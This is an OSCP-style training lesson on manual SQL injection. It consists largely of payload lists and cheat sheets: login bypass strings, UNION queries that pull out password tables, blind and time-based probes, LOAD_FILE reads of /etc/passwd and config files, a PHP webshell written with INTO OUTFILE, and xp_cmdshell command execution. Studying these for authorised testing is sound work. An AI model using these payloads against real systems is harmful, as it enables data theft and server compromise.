Nerd Level Tech logo
|
Lesson 13 of 24

Web Application Attacks

SQL Injection Attacks

5 min read

SQL injection (SQLi) remains one of the most critical web vulnerabilities. This lesson covers manual testing techniques essential for OSCP.

Understanding SQL Injection

SQL injection occurs when user input is directly inserted into database queries:

// Vulnerable code
$query = "SELECT * FROM users WHERE username='$username' AND password='$password'";

With input: admin' OR '1'='1

SELECT * FROM users WHERE username='admin' OR '1'='1' AND password=''

Identifying SQL Injection

Testing for SQLi

Common test payloads:
'              (single quote)
"              (double quote)
' OR '1'='1    (always true)
' OR '1'='1'-- (comment out rest)
1' ORDER BY 1--
admin'--

Error-Based Detection

Look for database errors:

MySQL:    "You have an error in your SQL syntax"
MSSQL:    "Unclosed quotation mark"
PostgreSQL: "syntax error at or near"
Oracle:   "ORA-01756: quoted string not properly terminated"

Manual SQL Injection Techniques

Authentication Bypass

-- Basic bypass
Username: admin' OR '1'='1'--
Password: anything

-- Alternative payloads
admin'--
' OR 1=1--
' OR 'a'='a
') OR ('1'='1

Union-Based Injection

Step 1: Find number of columns

' ORDER BY 1--
' ORDER BY 2--
' ORDER BY 3--  -- Continue until error

-- Or use NULL
' UNION SELECT NULL--
' UNION SELECT NULL,NULL--
' UNION SELECT NULL,NULL,NULL--

Step 2: Find displayable columns

' UNION SELECT 'a',NULL,NULL--
' UNION SELECT NULL,'a',NULL--
' UNION SELECT NULL,NULL,'a'--

Step 3: Extract data

-- MySQL
' UNION SELECT table_name,NULL FROM information_schema.tables--
' UNION SELECT column_name,NULL FROM information_schema.columns WHERE table_name='users'--
' UNION SELECT username,password FROM users--

-- MSSQL
' UNION SELECT name,NULL FROM sysobjects WHERE xtype='U'--
' UNION SELECT name,NULL FROM syscolumns WHERE id=(SELECT id FROM sysobjects WHERE name='users')--

Extracting Database Information

MySQL:

-- Database version
' UNION SELECT @@version,NULL--

-- Current database
' UNION SELECT database(),NULL--

-- Current user
' UNION SELECT user(),NULL--

-- List databases
' UNION SELECT schema_name,NULL FROM information_schema.schemata--

MSSQL:

-- Database version
' UNION SELECT @@version,NULL--

-- Current database
' UNION SELECT db_name(),NULL--

-- List databases
' UNION SELECT name,NULL FROM master..sysdatabases--

Blind SQL Injection

When no output is visible, use time-based or boolean-based techniques.

Boolean-Based

-- Test if injectable
' AND 1=1--  (should return normal)
' AND 1=2--  (should return different)

-- Extract data character by character
' AND SUBSTRING(username,1,1)='a'--
' AND (SELECT SUBSTRING(password,1,1) FROM users WHERE username='admin')='a'--

Time-Based

-- MySQL
' AND SLEEP(5)--
' AND IF(1=1,SLEEP(5),0)--

-- MSSQL
'; WAITFOR DELAY '0:0:5'--

-- PostgreSQL
'; SELECT pg_sleep(5)--

Reading Files (MySQL)

-- Read /etc/passwd
' UNION SELECT LOAD_FILE('/etc/passwd'),NULL--

-- Read web files
' UNION SELECT LOAD_FILE('/var/www/html/config.php'),NULL--

Writing Files (MySQL)

-- Write webshell (requires FILE privilege)
' UNION SELECT "<?php system($_GET['cmd']); ?>" INTO OUTFILE '/var/www/html/shell.php'--

SQL Injection Cheat Sheet

MySQL

-- Comments
--
#
/* */

-- String concatenation
'admin' 'istrator'  -- implicit
CONCAT('a','b')

-- Version
@@version
VERSION()

-- Current database
database()

-- List tables
SELECT table_name FROM information_schema.tables WHERE table_schema=database()

-- List columns
SELECT column_name FROM information_schema.columns WHERE table_name='users'

MSSQL

-- Comments
--
/* */

-- String concatenation
'a'+'b'

-- Version
@@version

-- Current database
db_name()

-- Enable xp_cmdshell
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;

-- Execute commands
EXEC xp_cmdshell 'whoami';

OSCP SQLi Guidelines

Remember: sqlmap's --os-shell is prohibited in OSCP. Manual injection is required.

Allowed:

  • Manual SQL injection
  • Burp Suite (manual mode)
  • Custom scripts

Not Allowed:

  • sqlmap automated exploitation
  • Auto-exploitation features

SQLi Testing Workflow

1. Identify input points
   └── Forms, URLs, cookies, headers

2. Test for injection
   └── Single quotes, errors

3. Determine database type
   └── Error messages, syntax differences

4. Enumerate structure
   └── Tables, columns

5. Extract data
   └── Credentials, sensitive info

6. Escalate if possible
   └── File read/write, command execution

Next, we'll cover command injection and OS command execution vulnerabilities. :::

Quiz

Module 4: Web Application Attacks

Take Quiz